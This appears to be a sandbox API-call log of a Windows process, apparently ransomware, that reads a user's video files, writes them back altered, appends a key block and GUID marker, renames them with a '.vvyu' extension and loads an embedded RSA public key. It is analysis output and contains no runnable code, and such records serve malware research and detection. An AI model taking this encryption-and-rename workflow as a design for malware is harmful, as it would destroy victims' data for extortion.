[0198.374] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.374] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x125b0) returned 0x2d51778 [0198.374] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d6b8 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d700 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.376] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a558 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bfe0 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.379] GetCurrentThreadId () returned 0x264 [0198.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c480 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.380] GetCurrentThreadId () returned 0x264 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0198.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5d0 [0198.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0198.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5e8 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0198.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d700 | out: hHeap=0x6a0000) returned 1 [0198.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.393] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x125a9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x125a9, lpOverlapped=0x0) returned 1 [0198.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.395] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x125ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.395] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.396] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.396] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.396] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.397] CloseHandle (hObject=0x52c) returned 1 [0198.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0198.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0198.399] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\ffcaMnGKKb8gMcSQDpq.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\ffcamngkkb8gmcsqdpq.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\ffcaMnGKKb8gMcSQDpq.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\ffcamngkkb8gmcsqdpq.mkv.vvyu")) returned 1 [0198.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.401] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.405] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e653040, ftCreationTime.dwHighDateTime=0x1d897c5, ftLastAccessTime.dwLowDateTime=0xfe2a55e0, ftLastAccessTime.dwHighDateTime=0x1d89c25, ftLastWriteTime.dwLowDateTime=0xfe2a55e0, ftLastWriteTime.dwHighDateTime=0x1d89c25, nFileSizeHigh=0x0, nFileSizeLow=0x15659, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MQWaq1YvFIYApR.swf", cAlternateFileName="MQWAQ1~1.SWF")) returned 1 [0198.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0198.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.406] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\MQWaq1YvFIYApR.swf") returned=".swf" [0198.406] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\MQWaq1YvFIYApR.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\mqwaq1yvfiyapr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.406] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=87641) returned 1 [0198.406] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.409] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x15633, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.409] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.413] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.413] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15659, lpOverlapped=0x0) returned 1 [0198.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 